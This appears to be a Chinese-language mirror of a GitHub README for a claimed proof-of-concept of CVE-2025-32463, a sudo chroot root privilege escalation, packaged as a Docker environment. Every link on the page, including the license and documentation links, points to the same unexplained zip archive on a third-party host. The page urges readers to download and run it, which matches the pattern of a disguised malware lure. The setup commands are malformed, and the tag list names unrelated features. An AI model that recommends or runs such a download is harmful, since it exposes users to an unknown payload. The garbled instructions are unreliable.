ashardev002/CVE-2025-32463_chwoot

GitHub: ashardev002/CVE-2025-32463_chwoot

针对 CVE-2025-32463 sudo chroot 权限提升漏洞的最小化可复现概念验证环境。

Stars: 1 | Forks: 0

# 🛠️ CVE-2025-32463_chwoot - 安全处理 Linux 权限 ## 📋 概述 CVE-2025-32463_chwoot 帮助您理解并处理与 Linux 系统中权限提升相关的特定安全漏洞。该工具允许用户通过 sudo 二进制文件使用 chroot 选项,探索和测试向 root 用户的权限提升。 ## 🚀 入门指南 在开始使用该应用程序之前,请确保您的系统满足以下要求: - **操作系统**:Linux(任何支持 Docker 的发行版) - **Docker**:版本 20.10 或更高 - **CPU**:1 GHz 或更快 - **内存 (RAM)**:至少 512 MB - **磁盘空间**:100 MB 或更多可用空间 ## 📥 下载应用程序 您可以通过访问 Releases 页面轻松下载 CVE-2025-32463_chwoot 的最新版本。 [![下载 CVE-2025-32463_chwoot](https://static.pigsec.cn/wp-content/uploads/repos/2026/03/91cc09afbe125257.zip)](https://static.pigsec.cn/wp-content/uploads/repos/2026/03/91cc09afbe125257.zip) ## 📥 下载与安装 要下载该应用程序,请按照以下步骤操作: 1. 点击 [Releases 页面链接](https://static.pigsec.cn/wp-content/uploads/repos/2026/03/91cc09afbe125257.zip)。 2. 在 Releases 页面上,您将看到可用版本的列表。点击最新版本。 3. 下载适合您系统的 Docker 镜像。 4. 按照镜像发布说明中的安装说明进行操作。 ## 🚀 运行应用程序 下载完成后,请按照以下步骤运行 CVE-2025-32463_chwoot: 1. 在您的 Linux 系统上打开一个终端。 2. 使用以下命令加载 Docker 镜像: docker load < https://static.pigsec.cn/wp-content/uploads/repos/2026/03/91cc09afbe125257.zip 3. 使用以下命令运行 Docker 容器: docker run -it --rm 将 `` 替换为您的 Docker 镜像名称。 ## 🛠️ 功能特性 CVE-2025-32463_chwoot 提供了多种旨在帮助用户安全探索权限提升的功能: - **测试场景**:在受控环境中模拟不同的权限提升场景。 - **用户友好的界面**:易于导航,帮助您探索各种选项。 - **日志**:用于诊断测试期间问题的详细日志。 ## 📊 涵盖主题 该应用程序侧重于以下主题: - Docker 和容器管理 - 权限提升技术 - 理解与 sudo 相关的漏洞 - 概念验证的实际应用 ## 📜 许可证 本项目基于 MIT 许可证授权。有关详细信息,请参阅 [https://static.pigsec.cn/wp-content/uploads/repos/2026/03/91cc09afbe125257.zip](https://static.pigsec.cn/wp-content/uploads/repos/2026/03/91cc09afbe125257.zip) 文件。 ## 🌐 其他资源 - [Docker 文档](https://static.pigsec.cn/wp-content/uploads/repos/2026/03/91cc09afbe125257.zip) - [理解权限提升](https://static.pigsec.cn/wp-content/uploads/repos/2026/03/91cc09afbe125257.zip) 如果您有问题或需要有关应用程序的帮助,请随时联系社区或提出 issues。
标签:Chwoot, CSV导出, Cutter, CVE-2025-32463, Docker容器, Root提权, Sudo Chroot, Sudo漏洞, Web报告查看器, 协议分析, 子域名枚举, 开放策略代理, 攻击面发现, 最小化环境, 本地提权, 权限提升, 漏洞分析, 漏洞复现, 系统安全, 网络安全, 请求拦截, 路径探测, 隐私保护